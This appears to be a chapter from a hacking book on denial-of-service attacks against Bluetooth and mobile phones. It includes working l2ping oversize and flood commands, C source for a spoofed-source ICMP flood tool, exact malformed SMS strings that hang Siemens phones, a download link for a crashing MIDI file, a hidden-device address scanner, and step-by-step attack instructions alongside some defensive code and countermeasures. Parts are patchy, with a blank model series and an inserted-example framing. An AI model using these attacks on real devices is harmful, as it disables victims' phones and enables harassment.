     A businessman from London, UK was visiting Paris on a business trip. On his way from the airport to the conference venue he was using his mobile phone to connect his laptop to the Internet, downloading a few PowerPoint slides that he needed for his presentation at the conference. Suddenly he received an SMS text message, and as soon as he viewed it his mobile phone became disabled and stopped working. He was extremely perplexed and did everything possible to make the phone work again. Only when he removed the battery and reinserted it did the phone start working. Not only was he unable to prepare his presentation properly, but his mobile phone also remained unusable for a considerable amount of time. Since then the businessman has discarded that phone and replaced it with another model.

Different Types Of Attacks

Bluesmacking (Ping of Death)

The Bluesmacking DOS attack is a classic example of a mobile denial of service attack that can be used against a variety of mobile phone devices to crash, hang or reboot them. Bluesmacking is often described as the mobile phone equivalent of the Ping of Death attack that affected older versions of Windows (and other operating systems of the time). In the Ping of Death, an attacker sends an oversized, fragmented ICMP echo request, larger than the 65,535 bytes an IP packet may legally have, and a vulnerable target crashes, hangs or reboots while reassembling the fragments. A number of mobile devices remain vulnerable to the Bluesmacking attack.

Every Bluetooth implementation has an upper limit on the size of a data packet it can safely receive, the MTU of the channel concerned. In other words, the implementation was not designed to handle packets larger than a certain predefined maximum. A mobile device that does not check incoming packets against that limit and receives an oversized packet (one larger than the maximum allowable size) will probably crash, reboot or hang. Hence, in the Bluesmacking attack the attacker creates a data packet larger than the maximum allowable size and sends it to the victim mobile device. It is important to note that different mobile devices have different maximum packet sizes, so an attacker will vary the size of the malicious packet according to the model of the target device. A correctly written stack is not affected: it rejects such a request instead of copying it into a buffer that is too small.

 

 Hacking Truth: The Ping of Death DOS attack is one of the most common examples of attacks against computer systems. The name derives from the fact that the attack could be carried out with the ping utility built into almost every Unix and Windows machine, simply by asking it for an oversized payload. As a result, an attacker could execute the attack from most operating systems without downloading or installing any third party tools. The ping utility is normally used to detect whether a remote computer is alive; it uses the Internet Control Message Protocol (ICMP).

 

The Bluesmacking DOS attack makes use of the Logical Link Control and Adaptation Protocol, or L2CAP, the part of the Bluetooth stack responsible for multiplexing higher-layer protocols, conveying quality of service information and controlling packet segmentation and reassembly. For connectivity testing, L2CAP plays a role similar to that of the Internet Control Message Protocol (ICMP) in the TCP/IP suite: among other things, its signalling channel allows a Bluetooth device to request an echo from another device in order to test its presence. The Linux BlueZ package ships with a number of standard tools including l2ping, which was written so that Bluetooth devices could check connectivity by querying and confirming each other's presence. Using this tool, the source device sends an L2CAP Echo Request to the destination and waits for a response. If the destination device is alive it sends back an Echo Response; otherwise nothing comes back. The exchange can be depicted in the

following manner:

Step 1: DEVICE 1 ---- L2CAP Echo Request ----> DEVICE 2

Step 2: (Alive)     DEVICE 2 ---- L2CAP Echo Response ----> DEVICE 1
        (Not alive) No response

 

By default the l2ping utility sends a 20 byte payload in the BlueZ version shown below (newer releases default to 44 bytes). In a Bluesmacking attack, however, the attacker sets the size of the outgoing packet with the -s option so that it exceeds the maximum the target device can handle. Since the packet is larger than the maximum allowable size, a target that does not validate lengths will hang, crash or reboot as soon as the oversized packet arrives. The syntax of the l2ping utility is as follows:

l2ping [-S source address] [-c count] [-s size] [-f] <address>

where

-S source address: the address of the local adapter to send the echo requests from.

-c count: the number of echo requests to send (by default l2ping keeps sending until interrupted).

-s size: the size in bytes of the data payload carried by each echo request.

-f: flood mode; reduces the delay between successive packets to zero.

<address>: the Bluetooth device address (BD address) of the target mobile device.

For example, the following output shows a Bluetooth device being queried with echo requests using the l2ping tool:

/home/ankitfadia # l2ping 00:80:37:B9:A1:2C

Ping: 00:80:37:B9:A1:2C from 00:80:37:B9:A1:2B (data size 20) ...

20 bytes from 00:80:37:B9:A1:2C id 100 time 63.31ms

20 bytes from 00:80:37:B9:A1:2C id 101 time 42.39ms

20 bytes from 00:80:37:B9:A1:2C id 102 time 42.12ms

20 bytes from 00:80:37:B9:A1:2C id 103 time 41.08ms

20 bytes from 00:80:37:B9:A1:2C id 104 time 40.51ms

5 sent, 5 received, 0% loss

Keeping the above syntax in mind, the Bluesmacking attack can be executed with the l2ping utility of the Linux BlueZ package in the following manner:

/home/ankitfadia # l2ping -s 1000 00:80:37:B9:A1:2C

Ping: 00:80:37:B9:A1:2C from 00:80:37:B9:A1:2B (data size 1000) ...

1000 bytes from 00:80:37:B9:A1:2C id 100 time 63.31ms

1000 bytes from 00:80:37:B9:A1:2C id 101 time 42.39ms

1000 bytes from 00:80:37:B9:A1:2C id 102 time 42.12ms

Note that a target which keeps answering, as this one does, has handled the oversized request correctly; a vulnerable target stops replying (and typically reboots) as soon as the first oversized packet arrives.
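To see why an oversized echo request matters, it helps to look at the bytes l2ping -s puts on the air and at what a receiver does with the length fields. The following Python is an added example, not from the original text or from BlueZ: it builds an L2CAP Echo Request frame as the signalling channel carries it, models a receiver that trusts the length field and so overruns its buffer on a Bluesmack-sized request (reported, not actually executed), and shows the validating receiver that checks every length against the bytes actually present and answers an over-MTU command with Command Reject, reason 0x0001 (Signalling MTU exceeded), as the L2CAP specification prescribes. The 48-byte MTU is the minimum signalling MTU the specification requires every device to accept; that it is also the target's actual limit is an assumption made for the demonstration.

```python
import struct

L2CAP_SIG_CID = 0x0001                  # signalling channel; echo requests travel here
ECHO_REQ, ECHO_RSP, CMD_REJECT = 0x08, 0x09, 0x01
REJ_SIG_MTU_EXCEEDED = 0x0001           # Command Reject reason code
MTU_SIG = 48                            # minimum signalling MTU every device must accept;
                                        # assumed here to be the target's actual limit


def _frame(cmd):
    """Wrap a signalling command in the basic L2CAP header: [pdu_len:2][cid:2], little-endian."""
    return struct.pack("<HH", len(cmd), L2CAP_SIG_CID) + cmd


def build_echo_request(ident, payload):
    """Echo Request command: [code:1][ident:1][len:2][data]; this is what `l2ping -s N` sends."""
    return _frame(struct.pack("<BBH", ECHO_REQ, ident, len(payload)) + payload)


def handle_echo_naive(frame, mtu=MTU_SIG):
    """Receiver the text describes: trusts the length field and copies that many bytes into
    a fixed MTU-sized buffer. A real stack overruns memory; this model only reports it."""
    code, ident, data_len = struct.unpack_from("<BBH", frame, 4)
    if data_len > mtu:
        return ("crash", f"{data_len}-byte echo copied into a {mtu}-byte buffer")
    return ("rsp", _frame(struct.pack("<BBH", ECHO_RSP, ident, data_len) + frame[8:8 + data_len]))


def handle_echo(frame, mtu=MTU_SIG):
    """Validating receiver: checks every length against the bytes actually present and the
    MTU before the payload is touched; an over-MTU command gets Command Reject, not a copy."""
    if len(frame) < 8:
        return ("drop", "truncated header")
    pdu_len, cid = struct.unpack_from("<HH", frame, 0)
    if cid != L2CAP_SIG_CID:
        return ("drop", "not the signalling channel")
    if pdu_len != len(frame) - 4:
        return ("drop", "basic header length does not match the frame")
    code, ident, data_len = struct.unpack_from("<BBH", frame, 4)
    if data_len != pdu_len - 4:
        return ("drop", "command length does not match the PDU")
    if pdu_len > mtu:
        # reason 0x0001 "Signalling MTU exceeded"; the reject data carries the MTU we do accept
        rej = struct.pack("<BBHHH", CMD_REJECT, ident, 4, REJ_SIG_MTU_EXCEEDED, mtu)
        return ("reject", _frame(rej))
    if code != ECHO_REQ:
        return ("drop", f"unexpected command code 0x{code:02x}")
    payload = frame[8:8 + data_len]
    return ("rsp", _frame(struct.pack("<BBH", ECHO_RSP, ident, len(payload)) + payload))


if __name__ == "__main__":
    for size in (20, 1000):                     # l2ping default vs. a Bluesmack-sized request
        req = build_echo_request(100, b"A" * size)
        print(size, handle_echo_naive(req)[0], handle_echo(req)[0])
```

The two receivers disagree only on the 1000-byte request: the naive one would already have copied past the end of its buffer, the validating one never reads the payload and sends a Command Reject that tells the peer which MTU it does accept.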

 

Hacking Truth: The Linux BlueZ package includes a variety of different tools, mainly:

Tool         Function
hciattach    Attaches a Bluetooth controller connected over a serial (UART) port to the stack
hciconfig    Used to configure Bluetooth devices
hcid         The Bluetooth Host Controller Interface daemon
ciptool      Used to set up, maintain and configure the Bluetooth Common ISDN Access Profile (CIP)

 

 

 

 

 

 

Fadia's Hot Picks for Popular Bluesmacking Tools

  1. Utility Name: BlueZ

Features: The official Linux Bluetooth protocol stack; it implements the Bluetooth wireless standard and contains the l2ping tool.

Download URL: http://www.bluez.org

  2. Utility Name: Tanya

Features: A DOS attack tool that is similar to l2ping. Download URL: http://www.transient-iss.com

  3. Utility Name: T-Bear

Features: A Bluetooth environment auditor for Linux. Download URL: http://www.transient-iss.com

  4. Utility Name: Motorola Kill

Features: A proof of concept tool written by Shaun Colley that floods vulnerable Motorola devices with IP traffic (SYN packets or ICMP echo packets) and crashes them. Source code:

 

# motorolakill.c

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <arpa/inet.h>
#include <netdb.h>

int main(int argc, char *argv[])
{
    int sock;
    int on = 1;
    char packet[5000];
    struct sockaddr_in dest;
    struct hostent *host;
    struct iphdr *ip = (struct iphdr *) packet;
    struct icmphdr *icmp = (struct icmphdr *) (packet + sizeof(struct iphdr));

    if (argc < 2) {
        printf("Usage: %s <host>\n", argv[0]);
        exit(0);
    }

    if ((host = gethostbyname(argv[1])) == NULL) {
        printf("Couldn't resolve host\n");
        exit(-1);
    }

    /* Raw ICMP socket: needs root (CAP_NET_RAW). */
    if ((sock = socket(AF_INET, SOCK_RAW, IPPROTO_ICMP)) == -1) {
        printf("Couldn't make socket!\n");
        printf("You must be root to create a raw socket.\n");
        exit(-1);
    }

    /* We build the IP header ourselves so that the source address can be forged. */
    if (setsockopt(sock, IPPROTO_IP, IP_HDRINCL, (char *) &on, sizeof(on)) < 0) {
        perror("setsockopt");
        exit(1);
    }

    memset(packet, 0, sizeof(packet));
    memset(&dest, 0, sizeof(dest));
    dest.sin_family = AF_INET;
    dest.sin_addr = *((struct in_addr *) host->h_addr_list[0]);

    /* Hand-built IPv4 header with a spoofed source address. */
    ip->ihl = 5;
    ip->version = 4;
    ip->tos = 0;
    ip->tot_len = sizeof(struct iphdr) + sizeof(struct icmphdr);
    ip->id = htons(1337);
    ip->frag_off = 0;
    ip->ttl = 255;
    ip->protocol = IPPROTO_ICMP;
    ip->saddr = inet_addr("1.3.3.7");       /* forged source */
    ip->daddr = dest.sin_addr.s_addr;
    ip->check = 0;                          /* the kernel fills in the IP checksum with IP_HDRINCL */

    /* ICMP echo request with an empty payload. The ICMP checksum is left at zero as in the
       original proof of concept; a receiver that validates it will discard the request. */
    icmp->type = ICMP_ECHO;
    icmp->code = 0;
    icmp->checksum = 0;

    printf("Ping flooding %s.\n", argv[1]);

    /* begin flooding here. */
    while (1) {
        sendto(sock, packet, ip->tot_len, 0,
               (struct sockaddr *) &dest, sizeof(struct sockaddr));
    }

    return 0;
}

# EOF motorolakill.c

Hacking Truth: Ping flooding is a slightly modified version of the Bluesmacking DOS attack that affects a number of different mobile phones. Every Bluetooth device can handle only a limited number of connections at the same time; once that limit is reached it can no longer establish any new connections. l2ping needs an established ACL connection to the remote device to send its echo requests over, so a flood of requests sent with l2ping can paralyse the Bluetooth capabilities of the target phone. When it succeeds, the ping flooding attack can crash, reboot or hang a vulnerable phone: the victim will no longer be able to discover other Bluetooth devices or accept incoming connection requests. The attack is easy to execute with the -f (flood) option of l2ping, for example:

/home/ankitfadia # l2ping -f 00:80:37:B9:A1:2C

Note that, depending on the target, ping flooding also works against devices in hidden (non-discoverable) mode. Hidden mode only stops a phone from answering inquiry scans; l2ping needs nothing but the BD address, which an attacker may already know or obtain by other means.

Jamming

As discussed earlier, Bluetooth is nothing but radio communication in the 2.4 GHz band. This makes it potentially vulnerable to interference, jamming and hence denial of service from other noisy sources in the same band, such as cordless phones, Wi-Fi equipment and microwave ovens. Bluetooth counters this with frequency hopping: it keeps changing its operating channel (1,600 hops per second), which makes a narrowband jamming attack very difficult. Such attacks are therefore not very common, since they require the entire band to be jammed, which is not very practical.

Malformed OBEX Message Attack

There are a number of Bluetooth and Infrared enabled mobile phones from different manufacturers (such as Nokia, Sony Ericsson, Samsung, Motorola and many others) available in the market. All of them use the Object Exchange or OBEX protocol to send and receive data. In early 2004 an OBEX-related denial of service vulnerability was discovered in a number of mobile phones that could be exploited by an attacker to remotely crash and reboot the vulnerable device.

In this type of DOS attack the attacker sends a malformed OBEX packet to the target mobile phone. As soon as the vulnerable device receives the malformed packet it terminates all active operations and is forced to reboot, so any phone call, text message or game in progress is lost. Such attacks can also drain the battery of the target device. The attack therefore causes loss of data as well as a good deal of inconvenience. It is important to note, however, that once the target device has rebooted it becomes fully operational again. One can argue that such DOS attacks do not really harm the device and merely cause disturbance and annoyance; nonetheless, the number of incidents involving malformed OBEX messages has been rising steadily in the last few years. Typically the attack is executed by following these steps:

  1. Identify a vulnerable target device that you wish to attack, for example a Nokia 6310i.
  2. Create a malformed OBEX message, send it via Bluetooth or Infrared to the target mobile device and wait for the device to reboot.

Failed Authentication Attack

 

The failed authentication DOS attack is a proof-of-concept attack that demonstrates yet another way of denying legitimate services and users on the target mobile phone. Although the technique is still at an early stage, enough instances have been recorded of it being used successfully against a number of different handsets. Carried out properly it causes a great deal of inconvenience to the victim, because it can silently cut a phone off from the very devices it trusts.

According to the Bluetooth specification, each time an authentication attempt between two devices fails, the verifying device must wait a certain interval before it accepts a new authentication attempt from the same claimant address, and that interval grows with each further failure. For example, consider a scenario in which device A tries to establish a connection with device B. If for some reason the connection request is not authenticated, device A will not allow device B to make another connection attempt until a pre-defined period has passed. Unfortunately this behaviour can be exploited by attackers to lock out legitimate users and services.

An attacker can pretend to be a trusted device (say device B) and flood the target device A with bogus, spoofed connection requests, so that even legitimate connection requests from B are rejected. Each failed authentication the attacker provokes sets a new period during which A accepts no connection attempts from B's address. This not only ties up resources on A but also makes it impossible for B to establish a Bluetooth connection with A. Hence the technique can be used both to make the Bluetooth features of a device unusable and to prevent two particular Bluetooth devices from communicating with each other. Such attacks also drain the battery of the target device. The attack requires custom tooling that simulates the attack conditions. Typically it is carried out in the following steps:

  1. Identify two Bluetooth enabled victim devices that trust and communicate with each other regularly.
  2. Send packets to one of the devices so that they appear to originate from the other, trusted device. This must be done before the two legitimate devices have established a connection with each other.
  3. Repeat step 2 until the resources on the target mobile phone are used up. At this point the target device will either lack the memory to run legitimate services or will refuse connections even to legitimate, trusted devices.
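The waiting interval is the whole point of this attack, so it is worth modelling. The code below is an added example, not from the original text: AuthGate implements the verifier side of the repeated-attempts rule in the Bluetooth Core specification (refuse attempts from an address until its interval expires, double the interval on each consecutive failure up to a cap, fall back to the base value once no failures have been seen for a quiet period), and lockout_simulation runs the three steps above against it with an attacker who presents the trusted peer's address and a wrong key. The timings, cap and quiet period are assumed values, since the specification leaves them to the implementation, and the address reused from the l2ping example above stands in for the trusted peer.

```python
class AuthGate:
    """Verifier-side model of the Bluetooth 'repeated attempts' rule.

    After a failed authentication from a BD_ADDR the verifier refuses further attempts
    from that address until a waiting interval expires; the interval doubles on each
    consecutive failure up to `cap` and drops back to `base` after `quiet` seconds
    without failures. All three numbers are assumptions for this demonstration.
    """

    def __init__(self, base=1.0, cap=8.0, quiet=30.0):
        self.base, self.cap, self.quiet = base, cap, quiet
        self.state = {}   # bdaddr -> {"until": t, "interval": s, "last_fail": t}

    def attempt(self, bdaddr, now, key_ok):
        st = self.state.get(bdaddr)
        if st is not None and now < st["until"]:
            return "refused"          # inside the waiting interval: even a correct key is not checked
        if key_ok:
            self.state.pop(bdaddr, None)
            return "ok"
        if st is None or now - st["last_fail"] >= self.quiet:
            interval = self.base      # first failure, or the earlier ones have aged out
        else:
            interval = min(st["interval"] * 2, self.cap)
        self.state[bdaddr] = {"until": now + interval, "interval": interval, "last_fail": now}
        return "failed"


def lockout_simulation(attacker_times, legit_times, addr="00:80:37:B9:A1:2C", gate=None):
    """Attacker presents `addr` (the trusted peer's address) with a wrong key at
    `attacker_times`; the real peer presents the correct key at `legit_times`.
    Returns what the real peer got back at each of its attempts."""
    gate = gate or AuthGate()
    events = sorted([(t, False) for t in attacker_times] + [(t, True) for t in legit_times])
    outcomes = {}
    for t, legit in events:
        result = gate.attempt(addr, t, key_ok=legit)
        if legit:
            outcomes[t] = result
    return outcomes


if __name__ == "__main__":
    # attacker retries the moment each window reopens; the real peer tries in between
    print(lockout_simulation([0, 1, 3, 7, 15], [5, 10, 20]))
    print(lockout_simulation([], [5, 10, 20]))
```

Because the lockout is keyed on a BD_ADDR that any attacker can forge, every failure the attacker provokes is charged to the legitimate peer, and the peer's correct link key is never even examined while the window is closed. A verifier that wants to resist this cannot treat the claimed address as the identity to lock out; that is a stack design question, not something a user can configure.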

 

Extreme Bluejacking

In the previous section we saw how Bluejacking can be used to send unsolicited messages to a mobile device over Bluetooth.

An attacker can use the same technique to send annoying messages to the target mobile phone over and over again. Repeatedly Bluejacking a victim not only keeps the victim's resources busy but also causes a lot of inconvenience and annoyance.

The fact that sending Bluetooth messages to a mobile device is both free and anonymous makes such attacks all the more popular. Even though they are not technically real DOS attacks, they can nonetheless cause unnecessary problems for the victim. Although Extreme Bluejacking can be carried out manually, an automated tool gives the most efficient results.

 

Malformed SMS Text Message Attack

 

Some of the most popular Siemens mobile phones, including the *35 and *45 series, are vulnerable to an attack involving malformed SMS text messages that can cause the target phone to crash, hang or simply reboot. If an attacker sends a malformed SMS text message to a vulnerable phone, considerable inconvenience and inefficiency may result. The attack is executed simply by sending the following malformed SMS text message to the vulnerable target phone:

"%LanguageName"

In the above syntax, LanguageName is the name of a language supported by the vulnerable mobile phone. It is important to note that the attack requires the double quotation marks to be present in the message and the first letter of the language name to be uppercase. For example, the attack can be executed with any of the following malformed messages:

"%English"

"%Deutsch"

"%Hindi"

When a vulnerable Siemens phone receives a malformed text message of this kind, it becomes disabled or hangs for a period of time; typically the display gets stuck at the Please Wait message. For example, the Siemens *35 series phones get disabled while the *45 series hang for almost 2 minutes; similarly, a Siemens C55 hangs for some time as soon as it receives such a message. Repeating the attack about 10 to 15 times can completely deplete the victim's phone battery. The fact that this vulnerability can be exploited remotely with a single SMS text message makes it extremely dangerous and easy to execute. According to a statement issued by Siemens, all devices from the          series on (except the S40 and CL50, as well as cordless phones and Gigasets) are vulnerable to this attack.

On most vulnerable Siemens phones one has to remove the battery for a few seconds and then put it back; the victim can then delete the malicious SMS text message. However, the Siemens C35i, M35i and S35i do not allow users to delete text messages without viewing them. On those devices the best way to delete the malicious message is to insert the SIM card into another phone and delete it there.

Local Malformed SMS Text Message Attack

In the previous example we discussed how some of the most popular Siemens mobile phones are vulnerable to a remote malformed SMS text message DOS attack. Most Siemens mobile phones are also vulnerable to a similar local malformed-message DOS attack. A text message of the following format causes a vulnerable phone to hang:

"%anystring"

In the above syntax, anystring can be absolutely any text string. It is also important to note that the attack requires all letters of the malformed string to be lowercase. For example, such a local DOS attack can be executed with any of the following malformed messages:

"%ankitfadia"

"%singapore"

"%usa"

When the local text message vulnerability is exploited on a vulnerable phone, the phone hangs, crashes or becomes disabled.

Malformed MIDI File DOS Attack

A number of LG mobile phones, including the popular LG U8210, are vulnerable to a malformed MIDI file DOS attack. An attacker can send a specially crafted MIDI file to a vulnerable phone; as soon as the phone plays the malformed file it crashes, hangs or reboots. The attack is executed by following these

steps:

  1. Download the malformed MIDI file from http://www.lucaercoli.it/LG/lgfreeze.mid.
  2. Send this file as an MMS message to the victim mobile phone.

Hacking Truth: Last year Nextel and Motorola announced that a number of their mobile phones, including the Motorola i205, i305, i530, i710, i730, i733, i736 and i830, reboot as soon as their GPS function is used. Fortunately, fixes have already been released and made available to consumers.

 

Malformed Format String Vulnerability

 

A number of business and personal users depend on their mobile phones to store, edit and transfer their contact list or address book. One of the most popular standards for storing and exchanging business cards is the vCard. A vCard is a standardised text format for contact details; on these phones it can be delivered over SMS, as a multi-part text message, so that users can exchange business cards with one another. Unfortunately, a number of Nokia mobile phones, including the 6210, are vulnerable to an attack involving malformed vCard messages.

An attacker can place malicious format strings into multi-part vCard messages and send them to vulnerable phones. As soon as the target phone receives the malformed vCard it crashes, hangs or simply reboots. On some occasions the victim even has to remove the battery and put it back to get the phone working again; sometimes the SMS receiver crashes, or a business card with garbled text is displayed on the screen. At the time of printing Nokia had unfortunately not released a fix for this loophole, and many phones remain vul­nerable to such attacks.

Hacking Truth: A number of Pocket PC mobile devices, including iPaqs, are vulnerable to a DOS attack that fills up all the available local storage. When an attacker sends a business card or vCard to the victim Pocket PC, it is automatically added to the local address book. If the attacker sends a large number of vCard messages, slowly but surely all the memory on the device gets used up.

 

 

 

Vulnerable Mobile Phone Handsets

A large number of handset models are vulnerable to the different DoS attacks that we discussed in this chapter, namely:

Mobile Phone Handset      DoS Attack
Nokia 6210                ✓
Nokia 6230                ✓
Nokia 6310                ✓
Nokia 6310i               ✓
Nokia 6600                ✓
Nokia 6810                ✓
Nokia 6820                ✓
Nokia 7650                ✓
Nokia 8910                ✓
Nokia 8910i               ✓
Nokia 610 Car Kit         ✓
Nokia 810 Car Phone       ✓
Sony Ericsson R520m       ✓
Sony Ericsson T39m        ✓
Sony Ericsson T68i        ✓
Sony Ericsson T610        ✓
Sony Ericsson Z600        ✓
Siemens *35 Series        ✓
Siemens 45 Series         ✓
Siemens C55               ✓
Siemens V55               ✓
Motorola S55              ✓
iPaq H3970                ✓
iPaq H3870                ✓
iPAQ rx3115               ✓
Motorola Timeport         ✓
Motorola T720             ✓
LG G1610                  ✓
LG U8200                  ✓
LG U8120                  ✓
LG M4300                  ✓


Countermeasures to DoS attacks

  1. Download and install the latest patches and firmware updates made available by the mobile phone manufacturer.
  2. Mobile phone operators should set up an SMS proxy that scans and filters out malformed SMS messages (including malformed vCards) before they reach users. This limits the chances of a DoS attack succeeding.
  3. Do not accept an incoming message or file (via Bluetooth or Infrared) from unknown people.
  4. Remember that handset DoS attacks are, by themselves, nuisance attacks: on most occasions they neither steal nor delete sensitive data, but merely cause inconvenience and lost availability.
  5. A number of handset manufacturers advise users to always keep their Bluetooth enabled mobile phones in hidden (non-discoverable) mode. Although this is not a foolproof countermeasure, it definitely makes the attacker's job more difficult.
  6. Do not pair your mobile phone with unknown devices. Pairing with unknown devices exposes you to a variety of different attacks. Pair only with known, trusted devices, and do so in a private setting where an attacker cannot observe the pairing.
  7. Use a long PIN code that is difficult to guess.

Hacking Truth: Most people are under the wrong impression that once their mobile phone is in hidden mode they are safe. Hidden (non-discoverable) mode only stops the phone from answering inquiry scans; most handsets, even in hidden mode, still respond to l2ping echo requests sent directly to their address. An attacker can therefore detect a hidden phone by sending ping requests to a range of probable Bluetooth device addresses (BD_ADDRs, which look like MAC addresses). This technique of discovering hidden devices is known as address scanning. Note that not all handsets are vulnerable to it.
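The address-scanning technique above, as an added example that is not part of the original text: it enumerates a range of BD_ADDRs and probes each with a single l2ping echo request. The probe relies on BlueZ l2ping exiting non-zero when the L2CAP connection to a non-existent address cannot be established (`Can't connect`), which is what an absent device produces; that exit-code behaviour is an assumption about l2ping rather than something the page states. The probe is pluggable so the enumeration logic can be run and checked without a Bluetooth adapter; the example addresses are taken from the case study below and the sample range is constructed.

```python
"""
Address scanning for hidden Bluetooth devices (added example).

A phone in hidden mode ignores inquiry, but usually still answers an L2CAP
echo request sent straight to its address.  Given a guessed prefix (the
vendor OUI plus the first bytes of the device part), walk the remaining
address space and record which addresses answer l2ping.
"""
import subprocess
from typing import Callable, Iterator, List


def bd_addr_to_int(addr: str) -> int:
    """'00:60:57:B9:A1:2C' -> 0x006057B9A12C."""
    parts = addr.split(":")
    if len(parts) != 6 or any(len(p) != 2 for p in parts):
        raise ValueError(f"not a BD_ADDR: {addr!r}")
    return int("".join(parts), 16)


def int_to_bd_addr(value: int) -> str:
    """0x006057B9A12C -> '00:60:57:B9:A1:2C'."""
    if not 0 <= value < 1 << 48:
        raise ValueError("BD_ADDR must fit in 48 bits")
    hexstr = f"{value:012X}"
    return ":".join(hexstr[i:i + 2] for i in range(0, 12, 2))


def addr_range(first: str, last: str) -> Iterator[str]:
    """Yield every address from first to last inclusive."""
    lo, hi = bd_addr_to_int(first), bd_addr_to_int(last)
    if hi < lo:
        raise ValueError("range end precedes range start")
    for value in range(lo, hi + 1):
        yield int_to_bd_addr(value)


def l2ping_probe(addr: str, timeout_s: int = 1) -> bool:
    """One echo request with a short timeout; True when l2ping could connect.

    Assumption: BlueZ l2ping exits 1 when connect() to the address fails
    ("Can't connect"), and 0 once it has run its ping loop.
    """
    result = subprocess.run(
        ["l2ping", "-c", "1", "-t", str(timeout_s), addr],
        stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL, check=False,
    )
    return result.returncode == 0


def address_scan(first: str, last: str,
                 probe: Callable[[str], bool] = l2ping_probe) -> List[str]:
    """Return the addresses in [first, last] that answered the probe."""
    return [addr for addr in addr_range(first, last) if probe(addr)]


if __name__ == "__main__":
    # Scanning the last byte of the case-study prefix; needs BlueZ and an adapter.
    for found in address_scan("00:60:57:B9:A1:00", "00:60:57:B9:A1:FF"):
        print("responds (even if hidden):", found)
```

Scanning a single byte of address space at one second per miss takes a few minutes; widening the guessed prefix makes the time grow by 256 per byte, which is why the attacker needs a good guess of the vendor OUI first.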

Live Attack Logged Data

Case Study 1

The following is an excerpt from the log file of a live ping-flooding DoS attack executed against a Nokia 7650 handset with the l2ping tool (the -f switch sends echo requests as fast as replies arrive):

/home/ankitfadia # l2ping -f 00:60:57:B9:A1:2C

Ping: 00:60:57:B9:A1:2C from 00:80:37:B9:A1:2B (data size 20) ...
20 bytes from 00:60:57:B9:A1:2C id 100 time 63.31ms
20 bytes from 00:60:57:B9:A1:2C id 101 time 42.39ms
20 bytes from 00:60:57:B9:A1:2C id 102 time 39.12ms
20 bytes from 00:60:57:B9:A1:2C id 101 time 40.11ms
20 bytes from 00:60:57:B9:A1:2C id 102 time 41.51ms
20 bytes from 00:60:57:B9:A1:2C id 101 time 40.33ms
20 bytes from 00:60:57:B9:A1:2C id 102 time 40.25ms
20 bytes from 00:60:57:B9:A1:2C id 101 time 40.29ms
20 bytes from 00:60:57:B9:A1:2C id 102 time 40.27ms

 

Once the handset's limit on simultaneous Bluetooth connections has been reached by the flood, the victim Nokia 7650 can no longer accept any further Bluetooth connections. If any other Bluetooth device then tries to connect to the victim, the following error message is displayed:

Can't connect. Maximum number of Bluetooth connections used.
